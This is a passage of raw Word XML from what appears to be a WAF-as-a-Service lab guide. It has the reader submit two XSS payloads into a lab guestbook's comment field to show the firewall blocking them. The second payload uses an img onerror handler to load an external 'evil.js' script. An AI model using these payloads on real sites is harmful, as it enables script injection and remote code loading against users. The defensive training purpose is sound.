          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> if they cannot trust the reputation of </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="042FE6B0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>our</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> online store.</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="3F61194C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00457F40" w:rsidP="006B1901" w:rsidRDefault="003A2A06" w14:paraId="609F2123" w14:textId="60E62B8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="003A2A06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Let’s</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="003A2A06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> do </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="1DE0F91E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">two </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="3F12B8A7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">attacks </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="006B1901">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">against </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>your WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="4272C4B7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">aaS CNAME </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">to see </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">the WAF </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="1989830E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> this</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="1989830E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack. </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="356A20EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="356A20EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>First</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="356A20EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will do a simple XSS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="494F299B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">attack </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="356A20EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="356A20EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> then a slightly more advanced one.  Both will be blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90B83" w:rsidP="3DB4835F" w:rsidRDefault="00B35D5D" w14:paraId="3E417D2E" w14:textId="2D01EEBF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B35D5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Go to your WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="1621A14C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>aaS</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00B35D5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> CNAME</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00390F68">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C90B83">
        <w:rPr/>
        <w:t>https://app####.prod.cudawaas.com</w:t>
      </w:r>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="00C90B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B1901" w:rsidP="50C40F79" w:rsidRDefault="006B1901" w14:paraId="0190ACD5" w14:textId="1BFEAB83">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="006B1901">
        <w:rPr/>
        <w:t xml:space="preserve">The comment field of the guestbook is vulnerable to </w:t>
      </w:r>
      <w:r w:rsidR="00457F40">
        <w:rPr/>
        <w:t>XSS injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B1901" w:rsidP="50C40F79" w:rsidRDefault="006B1901" w14:paraId="17BE2C7E" w14:textId="46FAD55D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="31E18100">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">lick on </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Sign Guestbook</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="0044252F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00463776">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">put in your name and some email address, and leave </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="119F0734">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">this text below as the comment </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>( you</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00DD0E51">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">can copy and paste it, but you </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00457F40">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">might have to fix up those single quotes due to copy and paste issues </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00DD0E51">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">make sure they are just single </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00DD0E51">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>quotes )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="00DD0E51">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333E7" w:rsidP="001E79D3" w:rsidRDefault="001E79D3" w14:paraId="761C35B1" w14:textId="5547939F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E79D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001E79D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E79D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'go to terriblestore.com for lower prices!');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35D5D" w:rsidP="50C40F79" w:rsidRDefault="000E572F" w14:paraId="4E2DB4CA" w14:textId="0CE0906D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="007708D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="000E572F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">his XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="007708D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">attempt </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">gets stopped at the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="2F600DF8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>aaS</w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="009F40FB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="007708D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="000E572F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">never </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="007708D2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">even seen by the application. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35D5D" w:rsidP="50C40F79" w:rsidRDefault="000E572F" w14:paraId="4B22E84C" w14:textId="010775EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Let us do another XSS attack, </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="73496234">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>this time slightly more advanced</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35D5D" w:rsidP="50C40F79" w:rsidRDefault="000E572F" w14:paraId="587BF68C" w14:textId="2A397EAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on Sign Guestbook and leave a comment as before, but this time put the following as the comment text.  Use copy and paste just remember to fix up any quotes </w:t>
      </w:r>
      <w:r w:rsidRPr="50C40F79" w:rsidR="6BE8F7FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35D5D" w:rsidP="50C40F79" w:rsidRDefault="000E572F" w14:paraId="0C1D6A0D" w14:textId="7ECBBD4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>="s=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>('script');</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>s.src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:hyperlink r:id="Rf4c1ec01213d4458">
        <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
          </w:rPr>
          <w:t>//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="50C40F79" w:rsidR="46BDC173">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Calibri" w:cs="Courier New"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1D1C1D"/>
        </w:rPr>
        <w:t>;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35D5D" w:rsidP="3DB4835F" w:rsidRDefault="000E572F" w14:paraId="1A3C2B31" w14:textId="7EECA1A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="44F2A4C5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">This will be blocked by the WAFaaS as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="44F2A4C5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>before, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="3DB4835F" w:rsidR="44F2A4C5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
